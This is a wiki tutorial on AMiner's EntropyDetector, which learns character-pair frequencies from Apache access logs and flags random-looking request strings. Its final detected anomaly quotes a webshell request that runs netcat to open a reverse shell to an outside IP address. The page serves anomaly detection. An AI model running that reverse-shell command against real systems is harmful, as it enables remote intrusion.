Skip to content

HowTo EntropyDetector

landauermax edited this page Aug 7, 2023 · 11 revisions

For many years, malware used DGA (Domain Generation Algorithms) for communication and data exfiltration. As a consequence, many detection techniques have been developed that attempt to recognize domain names that are randomly generated by these algorithms. One of them is a simple yet effective approach called freq. The idea behind this approach is that some characters are more likely to follow each other in the English language (e.g., 'q' is most often followed by 'u'), while other pairs occur only very rarely. Since these character distributions are different in randomly generated strings, we can measure how likely it is that any given string is either a real word or just a sequence of random characters.

Of course, we first need to find out the exact occurrence probabilities of each character pair. This blog post suggests to create it based on the Alexa list of most popular websites or whatever data you want to analyze in your own use-case, as long as it corresponds to normal behavior.

We really liked this idea and therefore implemented the EntropyDetector for the AMiner. Since the AMiner parses the log data and then applies detection on the extracted values, it is very easy to get started detecting random strings with the default frequency table. However, the real power of the AMiner is semi-supervised learning - we generate a frequency table for the data we analyze on the fly and at the same time check whether new values fit the character distributions observed up to this point. This means that the resulting frequency table fits the monitored data extremely well, and new values that do not fit the learned patterns are detected as anomalies.

Let's have a look at an example. In the following, we will use Apache access logs to learn the frequency table from the file entropy_train.log and use it to detect an attack in the file entropy_test.log. You can download both files from the links. The first lines of the entropy_train.log file look like this:

root@user-5:/home/ubuntu/entropy# head entropy_train.log
10.35.34.242 - - [30/Sep/2021:12:52:49 +0000] "GET / HTTP/1.1" 200 6122 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.35.75 - - [30/Sep/2021:12:52:55 +0000] "GET / HTTP/1.1" 200 9028 "-" "WordPress/5.8.1; https://intranet.price.fox.org"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.8.1 HTTP/1.1" 200 10846 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-content/themes/go/dist/css/design-styles/style-traditional.min.css?ver=1.4.4 HTTP/1.1" 200 1490 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1" 200 4505 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-content/themes/go/dist/js/frontend.min.js?ver=1.4.4 HTTP/1.1" 200 11448 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.0 HTTP/1.1" 200 31246 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-includes/js/wp-embed.min.js?ver=5.8.1 HTTP/1.1" 200 1098 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-content/themes/go/dist/css/style-shared.min.css?ver=1.4.4 HTTP/1.1" 200 23725 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"
10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.8.1 HTTP/1.1" 200 5265 "http://intranet.price.fox.org/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0"

Looking at the lines it is easy to see that there is one parameter that contains many character pairs that partially follow distributions of natural language: the requested resource, e.g., /wp-includes/js/wp-emoji-release.min.js?ver=5.8.1 in the last line of the sample. It is quite difficult to analyze this variable in general, since it is not really categorical - resources are often only temporary, such as caches - and there are just so many distinct resources that are retrieved. However, we can assume that most of the resources will follow a somewhat similar pattern of directory names (separated by slashes) and consisting of normal words that repeat in many lines. This makes it a good contender for our EntropyDetector.

We will use the following configuration to train the AMiner:

LearnMode: True

LogResourceList:
        - 'file:///home/ubuntu/entropy/entropy_train.log'

Parser:
        - id: 'START'
          start: True
          type: ApacheAccessModel
          name: 'apache'

Input:
        timestamp_paths: "/accesslog/time"

Analysis:
        - type: "EntropyDetector"
          paths: ["/accesslog/fm/request/request"]
          prob_thresh: 0.15
          default_freqs: False
          output_logline: False

        - type: "ParserCount"
          report_interval: 5

EventHandlers:
        - id: "stpe"
          type: "StreamPrinterEventHandler"
          json: True

Note that the LearnMode is set to True, so we are generating our frequency table from a file containing only normal behavior. Also, make sure that the input file is correctly set to the entropy_train.log file. Looking at the detector configuration, we can see that we analyze the requested resource (with parser path /accesslog/fm/request/request). Moreover, we use a threshold prob_thres (which determines how unlikely an observed string need to be in order to be reported as an anomaly) of 0.15 - the lower we set this threshold, the more randomness is allowed and the fewer anomalies we will get. We do not use the default frequency table (default_freqs is set to False) and do not print the parsed log line (output_logline is set to False). We also print how many lines are parsed in intervals of 5 seconds with the ParserCount so that we know when all lines are processed. Finally, we print the anomalies on the console using the StreamPrinterEventHandler.

That's all, we are ready to start the AMiner! Note that we use the -C flag to ensure that there is no model from previous runs that interfers with our test. Use the following command:

root@user-5:/home/ubuntuentropy# aminer -C -c config.yml

And we can see that we already get lots of anomalies. Let's have a closer look at the first two:

{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 2,
    "AnalysisComponentType": "EntropyDetector",
    "AnalysisComponentName": "EntropyDetector2",
    "Message": "Value entropy anomaly detected",
    "PersistenceFileName": "Default",
    "TrainingMode": true,
    "AffectedLogAtomPaths": [
      "/accesslog/fm/request/request"
    ],
    "AffectedLogAtomValues": [
      "/"
    ],
    "CriticalValue": 0.0,
    "ProbabilityThreshold": 0.15,
    "LogResource": "file:////tmp/entropy_train.log"
  },
  "LogData": {
    "RawLogData": [
      "10.35.34.242 - - [30/Sep/2021:12:52:49 +0000] \"GET / HTTP/1.1\" 200 6122 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0\""
    ],
    "Timestamps": [
      1633006369
    ],
    "DetectionTimestamp": 1637654745.74,
    "LogLinesCount": 1
  }
}
{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 2,
    "AnalysisComponentType": "EntropyDetector",
    "AnalysisComponentName": "EntropyDetector2",
    "Message": "Value entropy anomaly detected",
    "PersistenceFileName": "Default",
    "TrainingMode": true,
    "AffectedLogAtomPaths": [
      "/accesslog/fm/request/request"
    ],
    "AffectedLogAtomValues": [
      "/wp-includes/css/dist/block-library/style.min.css?ver=5.8.1"
    ],
    "CriticalValue": 0.016666666666666666,
    "ProbabilityThreshold": 0.15,
    "LogResource": "file:////tmp/entropy_train.log"
  },
  "LogData": {
    "RawLogData": [
      "10.35.34.242 - - [30/Sep/2021:12:52:55 +0000] \"GET /wp-includes/css/dist/block-library/style.min.css?ver=5.8.1 HTTP/1.1\" 200 10846 \"http://intranet.price.fox.org/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0\""
    ],
    "Timestamps": [
      1633006375
    ],
    "DetectionTimestamp": 1637654745.74,
    "LogLinesCount": 1
  }
}

So, the first anomaly corresponds to the first line in the file, where the requested resource is only a single character: /. Makes sense, since there is no model yet and thus every character pair is unusual. Accordingly, the CriticalValue is 0.0, which means that the line has no similarity to anything we have seen before (which is nothing, it is the first line anyway). The second line in the training log file also requests only the character /, and it is not reported as an anomaly since we just learned that this is normal. The third line has a more complex resource being requested: /wp-includes/css/dist/block-library/style.min.css?ver=5.8.1. In this case, the critical value is 0.0167, which is also very low. But what we can observe from the output is that the longer the AMiner is running, the fewer anomalies are reported. The reason for this is that the frequency table is slowly built and gets more and more accustomed to the strings we feed in. In the end, anomalies mostly look like this:

{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 2,
    "AnalysisComponentType": "EntropyDetector",
    "AnalysisComponentName": "EntropyDetector2",
    "Message": "Value entropy anomaly detected",
    "PersistenceFileName": "Default",
    "TrainingMode": true,
    "AffectedLogAtomPaths": [
      "/accesslog/fm/request/request"
    ],
    "AffectedLogAtomValues": [
      "/wp-cron.php?doing_wp_cron=1633280931.1716330051422119140625"
    ],
    "CriticalValue": 0.1480314621617555,
    "ProbabilityThreshold": 0.15,
    "LogResource": "file:////tmp/entropy_train.log"
  },
  "LogData": {
    "RawLogData": [
      "10.35.35.75 - - [03/Oct/2021:17:08:51 +0000] \"POST /wp-cron.php?doing_wp_cron=1633280931.1716330051422119140625 HTTP/1.1\" 200 150 \"-\" \"WordPress/5.8.1; https://intranet.price.fox.org\""
    ],
    "Timestamps": [
      1633280931
    ],
    "DetectionTimestamp": 1637654637.54,
    "LogLinesCount": 1
  }
}

The requested resource is /wp-cron.php?doing_wp_cron=1633280931.1716330051422119140625, so a huge part of the string consists of the timestamp. With that many decimal places, the character sequence (the digits) are obviously mostly random, so in a way, our EntropyDetector gave us a reasonable result, even though it is not related to an attack. The CriticalValue of the anomaly is 0.148, so maybe we need to set our prob_thresh slightly lower to avoid getting these false positives when trying to detect the attack in the test dataset.

But before we get into that, let's see what the AMiner learned. Open the persistency as follows:

root@user-5:/home/ubuntu/demo-detectors/entropy# cat /var/lib/aminer/EntropyDetector/Default
[[-1, [[47, 7559], [42, 310]]], [47, [[-1, 337], [119, 9379], [99, 1451], [100, 1758], [98, 275], [115, 907], [116, 1487], [103, 598], [106, 3953], [102, 1305], [63, 127], [112, 1242], [97, 3092], [105, 404], [108, 274], [104, 83], [118, 98], [114, 46], [117, 201], [122, 52], [101, 130], [113, 26], [109, 315], [107, 8], [110, 4]]], [119, [[112, 9676], [101, 830], [111, 459], [105, 48], [61, 4], [115, 28], [46, 18], [45, 4], [97, 4], [104, 4]]], [112, [[45, 8159], [104, 2368], [63, 557], [95, 53], [61, 127], [108, 1471], [100, 1416], [97, 609], [-1, 1811], [115, 26], [114, 439], [111, 198], [116, 98], [110, 64], [101, 38], [105, 101], [98, 14], [46, 4], [47, 4], [37, 12]]], [45, [[105, 2492], [108, 353], [99, 2542], [115, 693], [116, 590], [109, 439], [101, 481], [114, 541], [112, 730], [97, 5356], [53, 414], [119, 105], [52, 192], [57, 110], [98, 236], [117, 56], [106, 27], [104, 34], [50, 34], [110, 34], [102, 75], [111, 52], [118, 42], [103, 14], [100, 20], [113, 4]]], [105, [[110, 12730], [115, 2707], [98, 236], [103, 462], [116, 506], [111, 1008], [45, 228], [99, 683], [114, 597], [100, 182], [109, 347], [102, 124], [108, 171], [49, 26], [112, 86], [97, 304], [47, 131], [101, 65], [38, 4], [122, 4], [118, 4]]], [110, [[99, 2824], [46, 4014], [116, 5262], [45, 2730], [97, 237], [100, 502], [103, 252], [61, 402], [115, 1377], [47, 2716], [101, 251], [37, 26], [107, 187], [44, 120], [117, 110], [111, 495], [108, 81], [105, 32], [110, 18], [98, 4], [121, 12], [95, 1]]], [99, [[108, 2507], [115, 2327], [107, 678], [111, 3299], [114, 177], [117, 1420], [45, 105], [116, 448], [101, 439], [118, 52], [46, 26], [61, 112], [104, 234], [56, 99], [99, 66], [49, 76], [52, 86], [102, 83], [54, 67], [55, 78], [53, 40], [121, 14], [97, 40], [98, 47], [50, 24], [-1, 12], [51, 50], [100, 23], [57, 8], [48, 4]]], [108, [[117, 3655], [111, 1082], [105, 542], [101, 1512], [46, 274], [116, 248], [121, 152], [97, 134], [49, 66], [108, 73], [44, 30], [115, 64], [45, 4]]], [117, [[100, 2466], [101, 1251], [103, 1170], [122, 1416], [108, 301], [116, 342], [110, 246], [115, 115], [105, 157], [44, 40], [112, 91], [46, 26], [45, 26], [38, 10], [120, 8], [97, 4], [114, 4]]], [100, [[101, 3051], [105, 3528], [46, 787], [111, 177], [45, 793], [109, 4896], [115, 95], [97, 309], [54, 38], [53, 83], [112, 26], [100, 82], [57, 46], [98, 116], [37, 160], [44, 40], [103, 48], [99, 55], [102, 126], [55, 50], [121, 26], [-1, 38], [47, 85], [95, 4], [38, 23], [56, 12], [52, 12], [51, 32], [49, 33], [117, 4], [48, 60], [50, 13]]], [101, [[115, 5428], [46, 1074], [114, 5768], [110, 2696], [109, 1385], [45, 999], [100, 1159], [108, 424], [97, 395], [102, 305], [116, 1074], [112, 100], [98, 430], [103, 167], [99, 187], [56, 110], [-1, 34], [44, 118], [118, 40], [101, 96], [61, 386], [55, 32], [120, 60], [119, 50], [106, 11], [113, 18], [111, 14], [117, 12], [53, 21], [52, 41], [49, 33], [57, 20], [48, 12], [54, 21], [121, 8], [50, 27], [51, 64], [47, 8], [38, 23]]], [115, [[47, 9924], [115, 3668], [116, 3017], [63, 3934], [105, 630], [104, 456], [101, 1366], [99, 1518], [111, 563], [113, 101], [45, 143], [37, 38], [46, 492], [121, 26], [118, 53], [119, 26], [-1, 26], [112, 44], [38, 95], [44, 358], [117, 18], [97, 8]]], [116, [[47, 3213], [121, 1486], [101, 3218], [104, 1645], [114, 294], [105, 778], [115, 1556], [45, 718], [46, 356], [95, 42], [111, 266], [116, 96], [112, 40], [97, 135], [44, 106], [98, 52], [99, 42], [38, 358], [61, 354], [109, 8], [51, 4]]], [98, [[108, 337], [114, 318], [101, 236], [111, 641], [102, 445], [117, 70], [54, 42], [110, 52], [52, 75], [55, 42], [97, 226], [56, 97], [105, 13], [46, 4], [100, 16], [50, 32], [-1, 8], [53, 22], [51, 23], [98, 19], [49, 21], [57, 12], [99, 34], [38, 3]]], [111, [[99, 301], [110, 4796], [47, 598], [106, 210], [-1, 151], [105, 92], [109, 1299], [46, 234], [102, 429], [108, 349], [97, 628], [103, 110], [61, 30], [120, 261], [114, 735], [111, 56], [107, 60], [118, 97], [117, 97], [115, 101], [100, 56], [116, 30], [112, 56], [38, 115], [119, 8], [98, 4]]], [107, [[45, 302], [115, 76], [98, 160], [116, 26], [95, 160], [38, 40], [46, 53], [101, 116]]], [114, [[97, 862], [121, 1463], [61, 4112], [111, 350], [101, 1452], [100, 738], [116, 617], [55, 101], [45, 209], [105, 159], [103, 30], [109, 74], [47, 168], [117, 57], [115, 59], [46, 226], [73, 30], [38, 40], [44, 88], [98, 62], [112, 65], [80, 13], [110, 4], [108, 4], [118, 4], [95, 8], [-1, 16]]], [97, [[114, 1367], [100, 5608], [108, 238], [116, 446], [115, 1474], [118, 191], [117, 344], [119, 427], [46, 117], [45, 416], [106, 2416], [120, 2416], [110, 136], [55, 38], [101, 208], [97, 73], [98, 144], [49, 135], [53, 43], [103, 114], [44, 40], [99, 602], [102, 68], [105, 27], [56, 56], [112, 22], [121, 32], [54, 36], [51, 26], [52, 46], [57, 28], [-1, 8], [50, 35], [48, 22], [38, 45]]], [121, [[47, 1328], [108, 946], [45, 301], [46, 520], [102, 56], [110, 26], [38, 4], [101, 28], [44, 12], [111, 4], [99, 4], [98, 4], [109, 12]]], [46, [[109, 3591], [99, 1260], [56, 1862], [49, 2815], [52, 1668], [106, 2757], [51, 218], [50, 317], [54, 213], [48, 1144], [105, 165], [112, 2457], [57, 25], [119, 403], [103, 124], [55, 60], [102, 26], [111, 26], [115, 26], [113, 26], [53, 10]]], [109, [[105, 8756], [101, 2082], [98, 383], [111, 359], [109, 218], [103, 197], [115, 66], [97, 98], [45, 26], [112, 400], [117, 26], [99, 26], [46, 8], [108, 8]]], [63, [[118, 3960], [100, 52], [112, 127], [114, 42], [99, 112], [97, 350], [108, 1]]], [118, [[101, 4253], [105, 251], [98, 52], [103, 53], [45, 40], [50, 16]]], [61, [[53, 2037], [49, 1055], [51, 511], [55, 480], [104, 56], [97, 51], [48, 225], [50, 280], [108, 41], [100, 95], [44, 30], [106, 42], [119, 345], [110, 115], [52, 101], [115, 10], [102, 46], [57, 41], [98, 7], [56, 47], [99, 8], [101, 45], [54, 13], [47, 4], [117, 16], [37, 12], [116, 1]]], [53, [[46, 2287], [54, 93], [56, 91], [-1, 223], [48, 98], [50, 85], [49, 50], [55, 126], [97, 51], [100, 54], [102, 73], [52, 120], [66, 160], [68, 160], [57, 74], [101, 55], [51, 76], [53, 45], [99, 52], [98, 29], [38, 9]]], [56, [[46, 1847], [57, 62], [50, 108], [55, 107], [48, 72], [49, 93], [53, 114], [110, 26], [51, 124], [56, 124], [102, 81], [-1, 59], [52, 67], [54, 50], [97, 41], [98, 24], [100, 42], [99, 66], [101, 20], [38, 25]]], [49, [[-1, 2146], [46, 865], [54, 526], [50, 283], [57, 87], [56, 121], [51, 561], [99, 143], [55, 109], [49, 218], [48, 333], [53, 83], [52, 123], [97, 58], [37, 40], [121, 26], [45, 26], [38, 145], [102, 62], [101, 55], [98, 24], [100, 28]]], [104, [[101, 934], [97, 206], [112, 2368], [105, 722], [116, 34], [61, 26], [111, 185], [45, 96], [117, 160], [98, 141], [46, 8]]], [103, [[111, 625], [110, 197], [114, 275], [95, 52], [105, 1358], [117, 101], [47, 141], [46, 86], [37, 26], [101, 193], [63, 26], [116, 26], [115, 44], [45, 27], [-1, 63], [65, 28], [103, 19], [97, 70], [61, 1]]], [52, [[46, 649], [-1, 1088], [56, 48], [50, 134], [48, 278], [51, 130], [52, 93], [53, 143], [57, 49], [100, 50], [49, 75], [99, 61], [54, 74], [55, 30], [101, 63], [98, 29], [97, 49], [102, 12], [38, 18]]], [106, [[115, 5617], [113, 1215], [105, 210], [97, 2416]]], [113, [[117, 1276], [114, 101], [67, 13]]], [51, [[46, 1163], [51, 426], [48, 200], [55, 80], [49, 216], [52, 80], [50, 277], [53, 78], [65, 26], [97, 102], [-1, 94], [100, 63], [57, 95], [102, 40], [54, 52], [56, 41], [37, 4], [101, 37], [99, 21], [98, 20], [120, 4], [38, 15]]], [50, [[-1, 685], [49, 202], [52, 74], [54, 169], [51, 107], [57, 96], [55, 124], [70, 152], [48, 178], [50, 97], [98, 34], [46, 301], [53, 161], [99, 77], [97, 43], [101, 20], [38, 151], [56, 52], [37, 16], [100, 62], [102, 65], [47, 4]]], [102, [[114, 195], [97, 817], [111, 1031], [102, 445], [50, 537], [-1, 136], [105, 86], [49, 87], [100, 68], [51, 81], [48, 41], [57, 50], [101, 128], [38, 39], [53, 46], [54, 33], [99, 50], [55, 35], [98, 28], [56, 70], [52, 47]]], [54, [[46, 221], [51, 494], [53, 92], [54, 67], [55, 85], [52, 58], [49, 111], [57, 150], [98, 60], [97, 63], [-1, 74], [56, 71], [48, 72], [50, 77], [99, 28], [100, 24], [102, 16], [101, 23], [38, 3]]], [48, [[-1, 338], [48, 384], [54, 139], [51, 64], [46, 798], [47, 414], [57, 101], [55, 135], [52, 67], [49, 210], [56, 82], [53, 124], [110, 66], [100, 117], [38, 124], [37, 112], [97, 38], [50, 128], [101, 31], [102, 46], [98, 16], [99, 8], [45, 8]]], [95, [[119, 53], [99, 52], [116, 26], [48, 112], [49, 40], [97, 345], [110, 345], [112, 12], [50, 4], [51, 4], [114, 16], [108, 17], [85, 1]]], [55, [[52, 76], [53, 80], [46, 456], [50, 161], [54, 73], [49, 84], [51, 39], [101, 79], [97, 72], [-1, 132], [57, 88], [99, 58], [98, 74], [100, 42], [102, 36], [56, 82], [55, 58], [48, 95], [38, 91]]], [57, [[54, 83], [48, 220], [52, 47], [57, 69], [49, 70], [56, 86], [100, 45], [102, 50], [-1, 79], [55, 105], [46, 47], [97, 34], [99, 54], [50, 49], [53, 55], [51, 74], [101, 20], [98, 24], [38, 1]]], [42, [[-1, 310]]], [122, [[47, 1140], [45, 276], [120, 52], [97, 4]]], [120, [[46, 2232], [99, 52], [47, 115], [45, 30], [95, 345], [105, 15], [44, 4], [116, 8]]], [37, [[51, 26], [50, 152], [53, 320]]], [65, [[37, 26], [110, 28]]], [70, [[37, 26], [105, 26], [119, 38], [38, 30], [118, 12], [117, 8], [109, 4], [112, 4], [55, 1], [56, 1], [57, 1], [49, 1]]], [38, [[114, 26], [108, 160], [118, 112], [100, 40], [116, 345], [95, 362], [49, 345], [119, 9], [112, 12], [99, 4]]], [66, [[99, 160]]], [68, [[61, 160]]], [73, [[110, 30]]], [44, [[114, 70], [119, 232], [97, 120], [99, 40], [102, 36], [100, 40], [108, 80], [101, 44], [109, 65], [116, 40], [110, 40], [115, 40], [98, 40], [106, 42], [117, 42], [112, 11], [38, 4]]], [67, [[111, 13]]], [80, [[105, 13]]], [85, [[83, 1]]], [83, [[-1, 1]]]]

So, what does that mean? This list of lists contains all the character pairs and their respective occurrence frequencies. But there are not characters! Well, we just use their integer representation to avoid problems with displaying strange characters. For example, we use -1 for the beginning of the string (the non-existing character before the first character) 47 is the / character, and 42 is the * character. So the first list [[-1, [[47, 7559], [42, 310]]] means that almost all lines (7559) start with / and few (310) start with *. We also see in the next list ([47, [119, 9379], ...) that the character / is mostly followed by the character w (with integer representation 119). We can easily verify this manually by looking at the sample lines from before. There are even more occurrences than lines, which is simply explained by the fact that the character pair /w also occurs in the middle of the strings sometimes.

Now that we know how the EntropyDetector works, let's try to find the attack in the test file. We use the following configuration (we will name it config_test.yml to avoid confusion):

LearnMode: False

LogResourceList:
        - 'file:///home/ubuntu/demo-detectors/entropy/entropy_test.log'

Parser:
        - id: 'START'
          start: True
          type: ApacheAccessModel
          name: 'apache'

Input:
        timestamp_paths: "/accesslog/time"

Analysis:
        - type: "EntropyDetector"
          paths: ["/accesslog/fm/request/request"]
          prob_thresh: 0.12
          default_freqs: False
          output_logline: False

        - type: "ParserCount"
          report_interval: 5

EventHandlers:
        - id: "stpe"
          type: "StreamPrinterEventHandler"
          json: True

Note that we switched the LearnMode to False, since we think that our frequency table is sufficiently stable to correctly differentiate normal from anomalous behavior. We also change the input file to the entropy_test.log file. Finally, we change the prob_thresh to 0.12, because we hope that this will avoid getting too many false positives. We must be careful to not set the threshold too deep, otherwise we will not detect anything at all!

Now, run the AMiner again. Watch out not to use the -C flag this time, or the AMiner will delete the learned model and you will have to retrain. Use the following command:

root@user-5:/home/ubuntu/entropy# aminer -c config_test.yml
{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 2,
    "AnalysisComponentType": "EntropyDetector",
    "AnalysisComponentName": "EntropyDetector2",
    "Message": "Value entropy anomaly detected",
    "PersistenceFileName": "Default",
    "TrainingMode": false,
    "AffectedLogAtomPaths": [
      "/accesslog/fm/request/request"
    ],
    "AffectedLogAtomValues": [
      "/static/evil.php?cmd=netcat%20-e%20/bin/bash%20192.168.10.238%209951"
    ],
    "CriticalValue": 0.0997565057530329,
    "ProbabilityThreshold": 0.12,
    "LogResource": "file:////tmp/entropy_test.log"
  },
  "LogData": {
    "RawLogData": [
      "10.35.32.78 - - [04/Oct/2021:05:58:02 +0000] \"GET /static/evil.php?cmd=netcat%20-e%20/bin/bash%20192.168.10.238%209951 HTTP/1.1\" 200 131 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/93.0.4577.63 Safari/537.36\""
    ],
    "Timestamps": [
      1633327082
    ],
    "DetectionTimestamp": 1637656628.43,
    "LogLinesCount": 1
  }
}

We only get a single anomaly this time. And looking closer, we can clearly see that the requested resource is a command sent to a webshell called evil.php: /static/evil.php?cmd=netcat%20-e%20/bin/bash%20192.168.10.238%209951. The EntropyDetector successfully detected that the string does not fit to the usual resources and assigned the CriticalValue of 0.099, which is lower than our prob_thresh and thus detected.

The EntropyDetector has all kinds of useful parameters that can be set in the configuration. Check out the documentation here.